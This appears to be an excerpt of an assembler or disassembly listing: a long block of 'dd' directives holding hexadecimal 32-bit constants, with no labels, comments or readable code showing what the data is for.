dd 0C8D84DEEh, 519E38D2h, 54D986F2h, 2B07BC6Ch, 9608AC4Ah
dd 3CB5818h, 86D3191h, 6DDAD944h, 56EC03EEh, 0AC584495h
dd 8C44194Eh, 14D3987Fh, 0B3CD9EC4h, 6562A24Ah, 0C0AFC0Ch
dd 8F575B44h, 0EA1EC031h, 8E4747AEh, 94A27497h, 697D9E3h
dd 275435DAh, 4D378763h, 85C1D4F8h, 2ED466DCh, 289F66F1h
dd 84BD7C61h, 0ACF666C6h, 0E1B6506Ah, 58A69DBEh, 8547D4F0h
dd 62682A7Fh, 0A826AD27h, 428A39B1h, 6A431061h, 5D7C426Ah
dd 3DE6081Ah, 5BF7A2AFh, 31164FD8h, 822556D7h, 0F7975C20h
dd 107D0699h, 0E51ABF53h, 691EAEB5h, 9CCE08B5h, 0A3C8D38Dh
dd 0A2E4DFF4h, 5A9BCA9Ch, 0A7ECEB65h, 3D5E329Ch, 0C22A867Eh
dd 7BAE40Dh, 814B8AD7h, 7615B18h, 7381097Eh, 0FF24A689h
dd 53308B38h, 3EA3407h, 0E060ECE0h, 43149E8Eh, 0CC0E0D5Eh
dd 0F0F91250h, 0A70C7FFDh, 0EA3196E7h, 38694F71h, 0BBB50C19h
dd 0DA9D7CBDh, 6B902EB1h, 2379A8EAh, 0FADD4FC6h, 7A8C45FEh
dd 0E91F74BEh, 7AA8DB8Dh, 66F79E33h, 7364F63Eh, 0EFAAB2CDh
dd 725ACD39h, 5CC67193h, 7CDC4973h, 443DD0D2h, 85B13FF0h
dd 7DD8096h, 0C4C5A086h, 0A93CA3C1h, 0E94CB21Bh, 88D65E20h
dd 9121027Fh, 2B6DBE41h, 901E4AE2h, 7747F0ACh, 468727A4h
dd 48CB8B5Fh, 1C3B994Ah, 846E9574h, 0C1963323h, 0C402C81Eh
dd 6C4529AFh, 4FC98078h, 0AE2B04E9h, 0A7CD3EB6h, 0D7FAAB3Fh
dd 94F33405h, 8A3B9650h, 0D8EAD4E6h, 0C08AC918h, 0CB9BE664h
dd 84631695h, 0FBCE1383h, 441927h, 0EBAEFF48h, 0C1D198D5h
dd 6A2E83C0h, 36A2A948h, 4D34B12Fh, 58ACA61Fh, 0FB84AFB9h
dd 0F5229208h, 0CBA73335h, 0B1CC2FAh, 82E69819h, 694C940h
dd 0E226B93Bh, 9A885D6h, 35AA191Dh, 537871C6h, 283BEF36h
dd 0FE0E3279h, 0BE907D7Bh, 7E021D60h, 71FB74B0h, 0A47ED4C9h
dd 7F55FDFBh, 2E7FEE67h, 0EB5DD377h, 0F3A74A56h, 0BC75412Dh
dd 52971DF1h, 0D9B9F426h, 116D5B4Ah, 94E948E0h, 67B063DFh
dd 0DCB35C18h, 6BB7A5C5h, 8725D240h, 0C7EF2DF5h, 0DC81F0A6h
dd 16B2E3A8h, 14200C63h, 919E2181h, 60597C8Dh, 0F51E834Ah
dd 0A7677EDFh, 26011E1h, 7EAE744Dh, 0D615D061h, 3B544470h
dd 16054656h, 0F6970C25h, 0B0A7D30Bh, 0B281161Fh, 3F9F74CDh
dd 0F83FE17Fh, 211B6121h, 0E84AD5DCh, 8FE7B787h, 0AF2DFB1Bh
dd 0EBE4BB51h, 5DA5F131h, 445D31CBh, 0DF080D7Bh, 3338C117h
dd 0F487A390h, 19E83FD8h, 43EF0BF6h, 960388E0h, 0B7615A07h
dd 7DBA8009h, 0FCE89B7h, 7E8AF7AAh, 0E54A195Fh, 0B51343D5h
dd 0BB02CCC2h, 0A9F0B0D8h, 9C65B59Ch, 276F8E08h, 929530CCh
dd 0BDAB6EA1h, 8CA035h, 561E4623h, 4E8C6F1h, 14F50AC6h
dd 6E0CAA91h, 0F07AA08Bh, 164AD4AAh, 0A8183207h, 38535FE9h
dd 386627D4h, 7542DFD0h, 25872034h, 0D0A036FBh, 0FEA64BFh
dd 0B74BB967h, 0F1F1EC53h, 401FAC27h, 0ABE3D5A8h, 6E82E93Fh
dd 0B8535F97h, 0E72FCE93h, 0ED6358B0h, 254E9482h, 49F5CE36h
dd 2D6E1995h, 69BEE2CDh, 8C1D3FE3h, 9F511426h, 2EE92946h
dd 6B723D15h, 8A6D43C6h, 7EA6AEB4h, 0BD9170E3h, 8743BC70h
dd 0F0B482E0h, 0F0336096h, 0CF9FF90Ah, 0B68C56E9h, 5C3CB8F2h
dd 0C09F31FBh, 69250D9Ah, 0FE1BF03Dh, 49732A46h, 6F49A814h
dd 0C62D6C25h, 7C357D71h, 0BB62095Eh, 0BA305D18h, 7C1CF1E5h
dd 6DF415C7h, 0E73BD5Eh, 69A4DF14h, 0A9589B24h, 0E04AB603h
dd 0E6C0EC2Ch, 290D5E9Fh, 0F42193DDh, 0AE84D5F2h, 0B5952B29h
dd 91838D23h, 0B745AC08h, 9A67FAD0h, 9CE737FFh, 0C6877B65h
dd 0AF9C0996h, 0C0FE4655h, 918881E3h, 0BAA82F90h, 390B535Dh
dd 1FA8D2C4h, 0EA6742FDh, 0E3E2EBF0h, 6C77C754h, 0C8D1889h
dd 0DF7F9B0Fh, 0D602A24Ch, 37E663F8h, 0AC56888Dh, 0DBDB7597h
dd 7D5DE537h, 4DAAB141h, 0B547C9A0h, 0CC897062h, 4AB1620Dh
dd 0B260D3D4h, 29733069h, 0DB923FA6h, 7D47601Eh, 0F126E7B0h
dd 9454B004h, 0A95DA42Ah, 0BB2C4D71h, 0EBC836FDh, 0F5D50A8Ch
dd 0EE89397Dh, 0AFA002B6h, 9D8B53Ch, 0AB131499h, 0F9A543E1h
dd 0B243B4FFh, 3168D626h, 7B246496h, 794F13F9h, 0AB3ED509h
dd 6BAEFDEEh, 99B2713Fh, 2634A321h, 3365B247h, 0EAA24598h
dd 0EB93FB9Eh, 518EDECAh, 246FD37Dh, 0FCF63042h, 6CEC04D3h
dd 143CF830h, 7958A533h, 0D33A4C85h, 0EC4EA669h, 471AA78Bh
dd 0EF4CD63Dh, 10FE1D5Ch, 0EC8AEAB6h, 26B2EA92h, 4A4CFA6Ah
dd 61B55857h, 0EC6AB84Dh, 55221B2Fh, 4D17F506h, 67DF6416h
dd 0EA1E47C6h, 62DEA0B4h, 5D6D6B15h, 0ECB40802h, 2CABD7C0h
dd 0D5422CE0h, 342FA8D9h, 0B71E62C3h, 52EA41C5h, 0FA66DE49h
dd 0A857439h, 1658916Bh, 8AC749ABh, 0AE355068h, 0A65F87BCh
dd 0FF542CECh, 884DBC8Ch, 6AE5CAC4h, 0EB778536h, 334B52h
dd 0EE3357B4h, 6774B40Bh, 0BDF97ECEh, 0E420D9EBh, 0C167CEC6h
dd 0FA4D81EBh, 54BF051Eh, 435B8A4Eh, 0F274288Eh, 61F4A861h
dd 0E5820316h, 70A248D9h, 0E3C7A3C1h, 4C6359A8h, 98826C6Fh
dd 0FBEA0D52h, 0FD6D69C3h, 26F58243h, 0DFB8AEEh, 0C93481C1h
dd 96EDAA42h, 7D6C418Ah, 65D0717h, 85CFC335h, 0AC370D5h
dd 0FD5710D6h, 0A2FEACEBh, 2AAB76E5h, 7D9766C0h, 0CE95251h
dd 0EB57E2CDh, 0D89DA42Ah, 2A0E0E14h, 97E14BDBh, 8E0FC7DFh
dd 0CD22123h, 94B5E3C4h, 87FD0BF1h, 0B38EB281h, 8AA25965h
dd 78316E27h, 8CA8A5F7h, 0F52DB93h, 5071EB78h, 380B6EC7h
dd 0A700AA2Dh, 0E51F4CFEh, 2B6B7081h, 151FC019h, 10FC6D83h
dd 0CE5C85CBh, 910B0C25h, 9C4C9D88h, 0EE218F90h, 590E6889h
dd 43B88E19h, 5E86C22Dh, 7C3430F0h, 0CC23DAA6h, 7B1AC51Eh
dd 0DD961F4Fh, 9ACC38A6h, 0F22CE570h, 0DB23D87Ah, 27C15586h
dd 184F5650h, 3E589E3Eh
dd 1854C69Dh, 0F9E38897h, 9EC156Bh, 5BF3A5CEh, 83FEE9C5h
dd 3B5AA78Bh, 2911394Ah, 0D25B2D78h, 0F699EDC7h, 0C6AC2699h
dd 0C69F90FBh, 0CBE31D76h, 5831CC24h, 225F734Fh, 0EA8F185Eh
dd 0CAE45C61h, 7D95D92Dh, 62A95AE7h, 77C19356h, 53BA3FE1h
dd 0BD0BAFD7h, 2FE01ADAh, 0B507DAFBh, 0AC616C1Eh, 751D2333h
dd 2C7068A4h, 37B242CEh, 6AE46264h, 0B3290723h, 9963C284h
dd 94921A7h, 0F565381h, 4F5F065Ah, 5B72E89Bh, 0D10B682Ch
dd 0B8B417D3h, 0C898A0ABh, 7086773Fh, 0BB7F7FFEh, 0D5CD1EA8h
dd 0EFC5BE93h, 0D6C7A02h, 62C93F13h, 641C1BF4h, 702FC93Fh
dd 94DA90h, 810C282Fh, 53B86916h, 8C654854h, 73AD1B29h
dd 38A6D904h, 8D9404F8h, 0B4F5BE4Eh, 61A46C77h, 0FADCE952h
dd 9218F32Ch, 8741A8A5h, 0C7A7EB6h, 284154B7h, 0DA9134AEh
dd 531C6507h, 0F5387A7Bh, 0A494A5C2h, 2026812h, 0E0C624C1h
dd 518E6086h, 3389779Fh, 82D35FCBh, 99B2461Eh, 6AEA2F85h
dd 0F3A4A315h, 0EE5F0719h, 0F1C8C1F2h, 84FE1FF7h, 75D3FEC1h
dd 2F0EB699h, 7693EF4Eh, 79F4B3EEh, 0D04B368Eh, 0E0B6C9B6h
dd 37C32AF2h, 9A8D8B37h, 9871E3A5h, 62359188h, 8316127Ah
dd 0F868DBDAh, 0E6F603B5h, 23787FD7h, 9F1BBC83h, 1862927Ch
dd 241876EAh, 0D98134D3h, 0E9BB5390h, 0B7AF941Ah, 8FEC9113h
dd 43EE8744h, 278734BBh, 96977E00h, 770757Fh, 1C64F294h
dd 320F703Bh, 0F1F039D7h, 0AB2C5FA4h, 0B7F159DDh, 0B9439E25h
dd 0ADA52A7Fh, 0BB22E19Ah, 8D22F0A3h, 48CDB811h, 0BC424E8Eh
dd 6ED564E4h, 4A81CB3Bh, 0D3A5A219h, 4BC3378Eh, 0C402984Ah
dd 503793F1h, 4B15DEF4h, 0C8A64AFDh, 25753432h, 566AD51Ch
dd 0BE01DA95h, 7A3E71F5h, 6B67315Ah, 3BC282E2h, 5E33C2Dh
dd 0AF4691B2h, 0AF5120A0h, 875D06DCh, 0F0B4D914h, 0B9FD1689h
dd 3BCDAF83h, 6A644F2Ch, 0CB20A136h, 0B06F7ACEh, 1D07C122h
dd 4732C221h, 341F7578h, 1CF084E4h, 0E20F68B4h, 0C4167CF0h
dd 0DDCEB3A8h, 0E27CEC37h, 0B69AB361h, 26EF0C26h, 0DBBF9927h
dd 0C6014F4Fh, 281D4C5Eh, 25AE16ADh, 7CC49536h, 4389CEA8h
dd 0F5EC9EA6h, 8E901888h, 0FE4C19CFh, 4A0575E8h, 0D0A0F6A6h
dd 60621AFCh, 7B6F503Ch, 16350188h, 0C2AF0DA4h, 0D77E3AC4h
dd 0F6D93987h, 0F10329D9h, 9C96DC67h, 70F97103h, 7FCBAD59h
dd 76ECE44h, 1E6F3D29h, 88C2DECFh, 0BD6C68F6h, 906A978Ch
dd 972A8CF2h, 7EA55669h, 74C6AD17h, 75CAC3FBh, 0F0A51B4Ah
dd 2BA8DC9Ch, 981240F6h, 9B864090h, 2F5C8A24h, 0C79E71C8h
dd 62DAB020h, 73E5E1B1h, 0E5C253AAh, 0D41F6E1Dh, 21C70CDDh
dd 2797967Fh, 1D756E66h, 94EB1F9Ch, 9EA7CFA8h, 0BF6528F3h
dd 5FCBC8DEh, 9CD76EC4h, 14A9E0DFh, 1C6CAA81h, 9A218229h
dd 0C56DC785h, 1D8B489Bh, 0E92FD15Bh, 266CE65Bh, 78FC0E08h
dd 0E2B97D15h, 5358B4D7h, 5C87E353h, 0A3A5216Bh, 344D080h
dd 0B35575D4h, 7FF8954Bh, 3BA1A937h, 7A968E8Fh, 88323CF7h
dd 6517FAB7h, 903EE576h, 8B180E41h, 0E080DD50h, 5E01CDD0h
dd 0A78D6C21h, 3E3CB4B3h, 0D06E4BFAh, 0FFB46FC0h, 6878C358h
dd 0B825A244h, 0F902E17Eh, 1FDD909Fh, 0CD7D6B19h, 5E81B2Ch
dd 19CB5658h, 0C961D22Bh, 0B12AD951h, 0B159D965h, 4119042Bh
dd 425FF091h, 33F20F1Fh, 1CE62D0Ch, 0B7F672Eh, 0EFD98E99h
dd 0FDCC307h, 0BD52CF21h, 56875B9Ah, 0B32FF6A8h, 0E45110D9h
dd 29B17D7Ah, 9FC94467h, 0EB727154h, 0EFD49564h, 0C1BE4C63h
dd 0E48E4E6Bh, 35073020h, 7C1ABA1Fh, 5962F430h, 5358A46Eh
dd 0F0B8D453h, 1D949D53h, 945CA27Eh, 0DD67DB1Ch, 655D19D4h
dd 0CBEFD86Dh, 584C10E9h, 702BAF2Bh, 5610509Ah, 3924C55Eh
dd 4F9C7C4h, 0EB016313h, 1E363D80h, 0C8C84A86h, 0BC6C8A43h
dd 0CE4A8A70h, 0B19B8850h, 0A902C0B4h, 0CBF3D58Fh, 274B7F98h
dd 1A0E56h, 0D5DDC285h, 5B71C283h, 0FBC62020h, 3E53E4BEh
dd 0D088D4D4h, 0B23BDB34h, 0D762A4D6h, 993AC783h, 8317F474h
dd 7FF55982h, 4A7E4516h, 0C077D4C9h, 1CAC2804h, 0FF379305h
dd 0D5DAE6C2h, 45345DAEh, 4B33F190h, 0C7E0924Ah, 553F84B8h
dd 1C3DB74Ah, 7650F0C8h, 63B31615h, 0B0C8A55Ch, 3C8FED8Fh
dd 2876D7DDh, 764BCF2Ch, 0D7B15BAAh, 47EE59DAh, 843CA335h
dd 8A8D01D0h, 669FDD78h, 2B60A673h, 403E19C0h, 69D5CC7Ch
dd 102F0C92h, 0F612CE9Dh, 1DAA4F39h, 17F22A9Ch, 4C31762Ch
dd 51F0B54Fh, 54E084FBh, 7775EF96h, 0FF278B1Fh, 0A688A2C1h
dd 52753AEEh, 0D19975B2h, 9A7E1EA8h, 3584A932h, 0A8939505h
dd 0C473D87Bh, 0EE8BF463h, 345E995Bh, 816D571Dh, 9B9FC308h
dd 0A772EF10h, 73D25093h, 0DF6871C6h, 2D63358Bh, 9C74EE12h
dd 4030A850h, 4377B864h, 0CEE019Ah, 51646259h, 0FF4C4CC8h
dd 89D069E0h, 0F3E6DBF5h, 0D424F894h, 66D31067h, 98A6444Bh
dd 6C94E8Bh, 3C69EA21h, 1AFC2F9Ch, 90C79F23h, 0D00BF9FBh
dd 9ACF7FAh, 28E8AF82h, 0BF44859Dh, 99A8AE59h, 0DA1F0DC9h
dd 5223F885h, 870E65B2h, 0B9AE1E1Dh, 0D6AE57C9h, 0DE41D3F3h
dd 0AD1C6E44h, 879BFC10h, 0F185377Dh, 155725Fh, 0DDEBBC13h
dd 4165277h, 0AE854D0Ah, 1F397CEBh, 7D97A391h, 0B52998DFh
dd 1066185Eh, 26EDEE0Ah, 0F6C513ACh, 9ED87698h, 4E9306F0h
dd 5DABDB51h, 859DD772h, 19334B44h, 0FC075619h, 505414BCh
dd 0F2184B4Dh, 0A2830C47h, 0F99CC456h, 5B5997B7h, 0C30CAF87h
dd 19BF18A8h, 0EE983833h, 0E74DACDDh, 2BF5B285h, 50F7ED53h
dd 0B3186468h, 108DC5D3h, 61F41DEEh, 542D7B5h, 0C51773Dh
dd 4BF92A7Ch, 30C9E149h, 4A5220E5h, 41EA85DEh, 9772B4h
dd 953D25E4h, 9AA636B1h, 2561B111h, 0F3B365EBh, 1C425D6Fh
dd 0BCE7692Ah, 0D5129FC4h, 1C00CA06h, 7219E67Eh, 897FCEF8h
dd 40B106EEh, 5D96E403h, 0A5A35CE0h, 0E2FECB75h, 8AF4EF8Ch
dd 72C1667h, 3BDCD0F1h, 0CE429143h, 4AA86CB9h, 0A5DF8A03h
dd 328F6AE9h, 0E58475CAh, 2370B616h, 0CBB956FFh, 23689E38h
dd 53EE9D0Eh, 0D64E94E7h, 333C2F3Ch, 2164D83Ch, 0CB6F4A8Dh
dd 76F6FD63h, 49A47CFh, 182CB31Dh, 0C88C9FB0h, 13D04A27h
dd 5708D3A3h, 75DAA021h, 5156A419h, 0F9FA0EF0h, 7D358842h
dd 0A9908B84h, 5A5B54C9h, 0ADEBEB53h, 9298117Fh, 4F23E3F9h
dd 2E313547h, 4F9B29B3h, 4348A343h, 8504CCBAh, 7BD86B0Bh
dd 755B34DCh, 0CBC4E6EFh, 88E92ED3h, 11A2DBB6h, 151CE6C0h
dd 0EE0D482Eh, 760E572Ah, 60DD07DCh, 0FDA7E48Dh, 0CDF63DC8h
dd 831852AAh, 0F330B3F5h, 0A7183B73h, 26371936h, 0A9FE390Fh
dd 0FE0CB171h, 16C87502h, 8206B35h, 5B6E8442h, 494C646Bh
dd 34131636h, 2DFE7365h, 0EC94B444h, 3F96A7C5h, 511DAEC3h
dd 0BB473A34h, 3838D762h, 92D9AAD3h, 0BA7E5C5Dh, 37AF274Fh
dd 0DF3723A0h, 7A08ACDh, 9514F2AFh, 52F908CAh, 7D9D19E6h
dd 7AC0D482h, 30E0F92Fh, 0CB1EE013h, 0E6156E17h, 551E7E67h
dd 0EC14FC5Bh, 449E936Dh, 7BF86FD4h, 0AC1DD496h, 81C2B8Eh
dd 0FF173126h, 5479EFh, 9E4F1F93h, 0EA9ECB12h, 3E36C3F2h
dd 1F6216C5h, 96DB587Eh, 6C06E7A3h, 89C6B7F6h, 0C10ED1A9h
dd 5DB5B6F7h, 8A87FF29h, 0CB80D012h, 738AD74Dh, 183C3287h
dd 649249FAh, 9A85C350h, 0B5661F7Eh, 38B52F61h, 0D27FD10Dh
dd 1945DC69h, 2385164h
dd 0FA8C78ECh, 0E4B9E303h, 0A94E8BE3h, 4E9B86CCh, 61033618h
dd 1E2C4C55h, 0E72A1940h, 0E3CDEE49h, 0F3E4F42Fh, 0AF2E3AB5h
dd 0EEFF6917h, 0B5CF3A1h, 0BECC0DF3h, 2ED989E7h, 0AC45740Fh
dd 7871D289h, 93D759A5h, 8EE97FFDh, 26B93FFDh, 0A23113BBh
dd 7382DFB6h, 3AD966CAh, 71809B16h, 0FB965145h, 797A8768h
dd 35FD5E78h, 0E94F544Eh, 0FA092957h, 3F57A1AEh, 2E7269EEh
dd 0DBB1CF6Ch, 0F7799C15h, 82141705h, 0D29558D9h, 0D889E09Ah
dd 0F442334Dh, 69A36425h, 21E6A7E2h, 0A1ADA2Dh, 85DC794Bh
dd 9756ED58h, 0E7B6B116h, 65000D74h, 0D0AAD4ADh, 352C3AB0h
dd 0CEC3922Ch, 0E9BFADC1h, 1EA4DAE8h, 0E3DE3ADBh, 0AA870890h
dd 20D7DDA6h, 0ED881B4Eh, 8307BB09h, 2A7B7BE1h, 669DFBB7h
dd 72F31518h, 0F5B2D046h, 143C03Ah, 130775E3h, 3E16BCD2h
dd 46CC5C2Bh, 0D5590046h, 0D72C0701h, 0DCBC19B2h, 0AE2AA66Ch
dd 9326E1F1h, 0A9B302A0h, 78446B74h, 0C7C738Eh, 0EF543314h
dd 58A9EB11h, 2A30932Ah, 0FBB54B6Eh, 2523A569h, 78357A9Dh
dd 3A8B4B15h, 0E609B383h, 0B475C501h, 0F0A7826Ah, 0A298FB3Eh
dd 0C2837623h, 0AAD20D3Ah, 62AE0337h, 0E7FB4666h, 0C9D4153Bh
dd 9BCE4D9Eh, 84CD1872h, 6B1DC48Bh, 5ECFB29h, 6EEF4716h
dd 0A90F61B9h, 0E5ADD8E9h, 7BC2FAD5h, 1BFF5DD9h, 8411F2D3h
dd 4418B4DDh, 0B31B574Ah, 0FDDFBE8Fh, 0BCFB8A54h, 0A0D5C98h
dd 7BA49DB0h, 4A6AB1A1h, 771AD133h, 7E9EB5CDh, 92C0D80Fh
dd 0B4FA7E1Ah, 0E0547225h, 72278B06h, 0E712D95Bh, 19ABE05h
dd 0E2715F55h, 8B904464h, 8297BE8Eh, 13544203h, 7C9C218Fh
dd 0D7268C11h, 0B54DE91Ch, 0A8CD6FCFh, 0F9897647h, 4F39631Dh
dd 3625BA7Ch, 0D50C7A3Eh, 0A74BCDEDh, 0FE39F2C6h, 33DCE754h
dd 0C0225F06h, 88AC36A8h, 239163A0h, 46999646h, 759488FFh
dd 0C9600DA9h, 3F0BF054h, 36BB7506h, 0C340556Dh, 0B41286ACh
dd 0AE3E1990h, 978BBF4Fh, 5D7FFF6Eh, 5EB879BEh, 9AF2BF4Ah
dd 20D03B61h, 26752AEDh, 2534032Dh, 0C0E8CB38h, 0D46B15A3h
dd 3D392826h, 0EEFB0514h, 0E81BD37h, 6438FEEBh, 0F5A7C575h
dd 19076AADh, 48D5FE25h, 0CC46CA4h, 0D5B747A8h, 13DE2447h
dd 2139761Ah, 6447405h, 98B70406h, 0A91FE62h, 147D0CC8h
dd 7F869FDEh, 0D973EDE6h, 371BF2ECh, 41723F95h, 0D832C9A5h
dd 5094E812h, 0B42D720Fh, 0BC0D126Fh, 0FFB193A4h, 0A284E3FDh
dd 60D51BC0h, 1E956CC0h, 900AC7E9h, 2F570FFDh, 2A13EC32h
dd 3C121CD4h, 845FA3EDh, 0BD62578Bh, 14D08204h, 75E2DE22h
dd 162753E1h, 61DFE8AFh, 0CF0DAB53h, 74E3B259h, 5552402Bh
dd 84815C2h, 0C8BE27DEh, 6C4ED1DFh, 384C2655h, 4C56B941h
dd 0CF92CE08h, 40C79766h, 0EC0FA2DCh, 0E98FCB82h, 0D146307Fh
dd 4CCF3564h, 33983625h, 0E3BAC5F6h, 51A3200Fh, 51E52BEh
dd 0A11F5F75h, 6B5F782Bh, 0AC4147B9h, 69A9A3BEh, 0E51358E4h
dd 0F142FD41h, 0E5B43CD6h, 0E4E1D2AAh, 41898668h, 4111B14Dh
dd 2459E1DAh, 1CAB712Fh, 89177B23h, 50E1BA5Ch, 0B50A874Bh
dd 2EC6E31Eh, 0C25CA264h, 8782C783h, 0EDD74602h, 0BF13D376h
dd 73615778h, 4D838008h, 0DFE401E6h, 0F32D46FFh, 7D9D7670h
dd 0DE31E780h, 2F62E799h, 57E516F7h, 5631DF15h, 0EACDE2EFh
dd 8B924EFCh, 84EB6AF0h, 0B58B6F6Fh, 0EE00D0D3h, 0CC8C675Dh
dd 37104F17h, 2410E55Eh, 615B27C4h, 68D39C13h, 375BBFF5h
dd 0CAF702DAh, 1EE38D2Bh, 0F7A019BAh, 99B79EFAh, 16ACAFFDh
dd 63D6DA50h, 0AE0035B3h, 0F01CCE4Bh, 0C0B792D0h, 2426B2B7h
dd 9145ABEDh, 8F09BC99h, 0EA4D71F3h, 476F6D43h, 4F634C7Ch
dd 3E415F7h, 366BF420h, 0D4F65866h, 0DDBDD54Fh, 7266CB43h
dd 2E2A2631h, 5820425Eh, 4779932h, 20EC0050h, 52C6AF06h
dd 0AFCBBBC0h, 0F2C9F68Ah, 13454A47h, 5CACAF47h, 6402E932h
dd 80B53737h, 0A4CA3B28h, 3925FAA6h, 0C6756917h, 195D5522h
dd 75E9E322h, 5B9DE551h, 0B56AB88Eh, 4D6B6DF4h, 7C92459Fh
dd 0A2445FBAh, 0D5EDD626h, 0E9E98F97h, 6013A218h, 0B06261FEh
dd 0C60C41BAh, 0B22DC9C8h, 0B21A566Ch, 6C2678B9h, 0F822CF0Ch
dd 0E477A428h, 2592574Bh, 0F333D78Eh, 68FAD9F9h, 3D34F003h
dd 26F9892Eh, 73D1D8F0h, 20DE164Dh, 2D954C29h, 0AC02C08Fh
dd 0FA6ED3A4h, 1EF47349h, 4272C341h, 0EFE42759h, 6E1404C6h
dd 0C65A5A73h, 8807F282h, 4607DB14h, 9F831D7Eh, 55DB97F8h
dd 9354AB04h, 10CABB1Bh, 0F929ED36h, 78E85AFDh, 4845EC1Dh
dd 0F49986EFh, 887441D1h, 3900BD50h, 72703DD9h, 0E6703EFCh
dd 7171E54Eh, 4C7C06ABh, 8CF2FDB8h, 0CC482BC2h, 44D3B665h
dd 2B7E5A9Eh, 0AA0A53B3h, 3452420h, 3F109024h, 0A7F5FD3Dh
dd 3653E3FAh, 5AF00683h, 22C41E73h, 0CFA702B5h, 54930C2Ch
dd 710F84AFh, 49BBB036h, 0F202B162h, 0BEEA19AEh, 5A98CE5Bh
dd 346340Bh, 3475EB21h, 368052F6h, 38307F3Fh, 9680A8DDh
dd 9AA3DD03h, 0E77154F3h, 0D5CB10B6h, 44E5F4CAh, 0EA37C409h
dd 6F54897h, 2D96C32Ch, 76F3600h, 5D06A96Dh, 9AC72901h
dd 3D3FC7FCh, 78D339DDh, 0E504D503h, 66DE63CBh, 2C599278h
dd 757FCFD8h, 0A12B8E49h, 0AC27E501h, 68997E0h, 9C596A0h
dd 30B8751Eh, 58A1C07Ch, 1A62E74Dh, 0D394E72Ch, 137B6E7Ch
dd 0E6A5A2C6h, 88C3A933h, 4B2ACEA8h, 4066E6A5h, 4639169Ch
dd 0B64DD34Fh, 15910D74h, 0E0A02643h, 888F2661h, 22E4D3Fh
dd 1E5B378Dh, 0CADFE696h, 0A966B533h, 31967D6Bh, 6E416FC8h
dd 1155DA28h, 7675AE66h, 801E2CE0h, 0F947CA2Bh, 2D97F5CFh
dd 0A0533411h, 671BA02Eh, 79E608B3h, 0EE0B7B29h, 0C9B97FE5h
dd 0DE3897Fh, 52D6B9EDh, 142F82Bh, 298B2687h, 7A40DABFh
dd 0E3DC6333h, 72CC2320h, 7E3597BCh, 0C37798FDh, 2FBD7AB0h
dd 20640630h, 32796873h, 0DCD51845h, 363501F4h, 58AF7E99h
dd 0ACBF2AD5h, 9BDA8969h, 0CD3BBDACh, 0EC1FD830h, 135730D6h
dd 5CD806B0h, 0DFABBFFEh, 0C1015E73h, 9F6BA064h, 0D07784D7h
dd 0D4B61B32h, 0FF45D97h, 98DC0268h, 0C870F225h, 0D7AD2BDAh
dd 6BB8F2D7h, 4EBBB2A3h, 51E8E9B1h, 968FD311h, 0FEC40E8Dh
dd 0B9884784h, 0F6D99AC0h, 3B95DE5Fh, 8614DC75h, 0FE731D9Ch
dd 70BD7D7Dh, 0A3E2AEB6h, 16C842B9h, 4978AE87h, 4FF826E1h
dd 9F3DC349h, 8ECEA69Ah, 7CE04F6Ch, 32349474h, 844EE365h
dd 7D7A1C07h, 2D2D2F45h, 0BAD41448h, 0AC080247h, 3AC0176h
dd 3565EE9h, 45FDB893h, 0F8A30B64h, 0ABD25983h, 0C268BC8Eh
dd 0FEEAC09Eh, 60EA9EC1h, 0A4FF6BE4h, 6267F7ECh, 525034FDh
dd 7FF33E7Eh, 0CC7BECADh, 0AEC3F9ECh, 4726B570h, 0F5E95E8Eh
dd 2F39C00Eh, 2667B30Dh, 0D7E9E589h, 0FCB72EFDh, 1C6462F5h
dd 9E6A4F10h, 772813Ch, 235B30CDh, 8195C588h, 15C99561h
dd 0D7E10D7h, 2EEE9466h, 144F6A54h, 4EC36F90h, 1FAE4F58h
dd 1AE75AE3h, 0C574E4AFh, 0DCC7DA9h, 4992E608h, 0A3639121h
dd 9A56DC78h, 6EB8803Fh, 0EFA5C572h, 74C039A2h, 0ECB9B3B0h
dd 0E7DCCD9Dh, 0C3248D21h, 0E9F86F00h, 0D8D21020h, 9D9E570Ah
dd 0B2EEB70Ch, 20B61FE9h, 610017C4h, 5B21440Dh, 0BA92BCDEh
dd 9DB3AA7Bh, 0CAF3FCA6h, 1D34F5Bh, 7D5257Ch, 79A5F20Ch
dd 0A6B6D808h, 36573905h, 7074E4E7h, 136D90Bh, 8FD7B9D9h
dd 38F2BFF4h, 0A9DD93ACh
dd 6DEAC53Dh, 796BCC38h, 9EC2A503h, 5A6DDDB9h, 0AC930D0Fh
dd 219AD496h, 0A2ECEEBCh, 0D27F45D5h, 0CA7E58CAh, 0F32B68DEh
dd 0B9E83207h, 2F855E4Bh, 7ED2B5BBh, 0AA6882F0h, 0AADCC98Dh
dd 0AF49055Bh, 0C3B932B1h, 0ABE9CE7h, 1A705545h, 27AE8CBFh
dd 52EB80C6h, 3A6629DDh, 5EEAF4A8h, 0B6E4B245h, 0CC2D84ECh
dd 0F81E9056h, 259DD98Ch, 0CC8460D2h, 0C96C25BBh, 0C64E76C5h
dd 986D6B6Dh, 2DA4892Dh, 92D69293h, 148325A2h, 0C9CB9246h
dd 17B000C6h, 6BF2AD0h, 5891CAB9h, 0B00E9C01h, 0E501B244h
dd 0C01A553Ch, 0A2FAB4A1h, 94268EB5h, 0DE20D81Bh, 0D6857C2Fh
dd 0FDD9F7DBh, 935DB2F7h, 5EC6B137h, 941159B4h, 0CC297595h
dd 134137CFh, 7A7A9839h, 7BC5A1D5h, 429AFC4Fh, 0B2E52695h
dd 6B900FBAh, 0A3B36BCEh, 0E3922093h, 0D2725041h, 0E5A36545h
dd 0ADD6B841h, 0EA92CB60h, 999A0815h, 2D7DA5B0h, 5CAF6E73h
dd 867B2ACDh, 0A718F86Ch, 54911E94h, 5EAF8561h, 0E8B2F4B4h
dd 0F0544BBEh, 0A071F0A2h, 41921823h, 0ED3E2652h, 0ABC3A04Ah
dd 58F14719h, 0EA720CF6h, 5AB21823h, 34B92E4h, 50F8AE79h
dd 18070BE7h, 86C60356h, 6247C76h, 7AF28CEAh, 46F127F1h
dd 70FB4005h, 0FD57F235h, 0A3F83DE1h, 56F86533h, 0F1BE9863h
dd 346B8FD9h, 50926F85h, 7AF8F723h, 0CEC6128Bh, 2F395B79h
dd 0D9129CEEh, 3741AC55h, 64C06F45h, 1D1CA7F6h, 2F32D48Eh
dd 6893F9D3h, 8350E275h, 26099523h, 1A24B268h, 8C28D4Dh
dd 0DFE547FEh, 0DBB44AC4h, 1EFFE21h, 0F4394654h, 5FD2469Fh
dd 0B05A3866h, 5F0B7C42h, 9B6D76B5h, 0B5C40F25h, 0B9576734h
dd 8A7A0621h, 980B5777h, 751DC8E3h, 98F89E08h, 9F15EAA9h
